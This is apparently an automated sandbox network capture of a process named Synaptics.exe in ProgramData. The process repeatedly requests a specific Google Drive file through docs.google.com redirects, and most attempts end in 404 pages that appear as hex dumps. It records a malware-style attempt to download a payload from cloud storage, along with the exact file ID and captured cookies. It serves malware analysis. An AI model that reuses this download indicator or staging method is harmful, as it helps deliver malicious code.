                                                                                                                                        Cookie: NID=520=FQNrFMPCubAKFj9y0Z4k1ouEUX4Kui-QjTdr291lluRJVHeBtM1mmeusg_KkXpwdOwLJs5cOvnhmTLnOvRQR4IVppbf3RIy65RY9Q-WoT2r9-CIWSaAiRQVqHD4q_Ul2GM-1Je42Oomn7qeJ5CNwHAcFXx9lSOPP_EtpXCcGhvcSUwTGnBqeegrs


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        45192.168.2.549795142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:33 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        46192.168.2.549796142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:33 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        47192.168.2.549807142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:34 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:34 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC7INzbUNYBFIBWutVzZk2kxWKrVWj0m8vfLwFTpU9lhY6UIkWgLH9_jP_5jCTI2yAkJhiFAS7E
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:34 GMT
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-O_5y2BxyfTnfbedJ6JuFhg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:34 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                        2024-12-30 10:46:34 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 34 4c 53 72 67 79 6d 67 78 78 70 49 46 75 71 6a 35 6d 31 72 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="D4LSrgymgxxpIFuqj5m1rQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                        2024-12-30 10:46:34 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        48192.168.2.549806142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:34 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Cookie: NID=520=FQNrFMPCubAKFj9y0Z4k1ouEUX4Kui-QjTdr291lluRJVHeBtM1mmeusg_KkXpwdOwLJs5cOvnhmTLnOvRQR4IVppbf3RIy65RY9Q-WoT2r9-CIWSaAiRQVqHD4q_Ul2GM-1Je42Oomn7qeJ5CNwHAcFXx9lSOPP_EtpXCcGhvcSUwTGnBqeegrs
                                                                                                                                        2024-12-30 10:46:34 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:34 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-KzV_YcqgZwUpxx_SmLzu0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                        49192.168.2.549805142.250.186.174443
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:34 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Cookie: NID=520=FQNrFMPCubAKFj9y0Z4k1ouEUX4Kui-QjTdr291lluRJVHeBtM1mmeusg_KkXpwdOwLJs5cOvnhmTLnOvRQR4IVppbf3RIy65RY9Q-WoT2r9-CIWSaAiRQVqHD4q_Ul2GM-1Je42Oomn7qeJ5CNwHAcFXx9lSOPP_EtpXCcGhvcSUwTGnBqeegrs
                                                                                                                                        2024-12-30 10:46:34 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:34 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Dctp2acIbG4NIDuLz4p3Tw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        50192.168.2.549813142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:35 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Cookie: NID=520=FQNrFMPCubAKFj9y0Z4k1ouEUX4Kui-QjTdr291lluRJVHeBtM1mmeusg_KkXpwdOwLJs5cOvnhmTLnOvRQR4IVppbf3RIy65RY9Q-WoT2r9-CIWSaAiRQVqHD4q_Ul2GM-1Je42Oomn7qeJ5CNwHAcFXx9lSOPP_EtpXCcGhvcSUwTGnBqeegrs
                                                                                                                                        2024-12-30 10:46:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:35 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-_L0y7eANwOWQoIWf1zgSdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        51192.168.2.549814142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:35 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:36 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC7_LzXVOPHk1zy02ujums4x9ocqNfziH5KRqyHhfc-E82tlFT6RoJQ6MthNPi-X19VV
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:35 GMT
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-33GJqMlK8Jsh_0Pp8Arv6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:36 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                        2024-12-30 10:46:36 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 30 51 74 55 4a 56 30 2d 70 73 53 34 39 76 34 38 64 49 50 6b 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="R0QtUJV0-psS49v48dIPkg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                        2024-12-30 10:46:36 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        52192.168.2.549815142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:35 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Cookie: NID=520=AjF33IdaeUNmHlmeyv_rklrZSnVFv8lgySmei1Dsqdy2rFxSjjfnAO-cl39aHo2JrrTKdNoIFV6ku8M9RkVKkd4wDR3j0NCN6DfoPbxsWlGAYN6sqEfJqKWWg0zy5MERV4xjBejEASTfCcn004MOi4zjgfmGet7SvpsNHYPAqhjQfvoi6GZ98aQ
                                                                                                                                        2024-12-30 10:46:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:35 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-yd-y3ApeeLp9LDiwfFaXhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        53192.168.2.549816142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:35 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:36 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC5sGdVSkZMHNf8RKW2yNZtrtIcJCFmJ6NJZBpy6HPbStB5eXRKI0AthS24HA6soaUv_
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:36 GMT
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-zoIHPCHMHKSeV-G3pnaCvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:36 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
